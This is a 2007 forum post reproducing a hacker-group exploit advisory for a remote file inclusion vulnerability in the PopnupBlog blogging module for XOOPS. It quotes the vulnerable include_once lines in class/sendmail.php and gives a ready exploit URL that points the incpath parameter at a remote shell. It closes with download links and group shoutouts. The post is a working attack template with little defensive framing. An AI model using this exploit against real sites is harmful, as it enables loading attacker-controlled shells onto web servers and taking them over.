Ras Posted July 24, 2007 Report Posted July 24, 2007 ############################################################################################### ___ ___ _# / _ \ / _ \ | |# __ _| | | | | | |_ __ ___ _ __ ___| |_# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|# __/ |# |___/###############################################################################################INFO:#Program Title ################################################################################PopnupBlog (XOOPS Module) Remote File Inclusion Vulnerability##Description ##################################################################################Blogging module for XOOPS CMS##Vuln Code ####################################################################################In /class/sendmail.php# include_once $incpath.'class/log.php';# include_once $incpath.'class/mbstrings.php';##Script Download ##############################################################################[url]http://www.xoops.org/modules/repository/singlefile.php?cid=4&lid=1412[/url]##Original Advisory ############################################################################[url]http://g00ns-forum.net/showthread.php?t=8643[/url]##Exploit #######################################################################################[url]http://[[/url] site ]/modules/popnupblog/class/sendmail.php?incpath=[ shell ]?##Credits ######################################################################################FiSh for vulnerability#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke# grumpy, and everyone else at g00ns.net############################################################################################## Quote
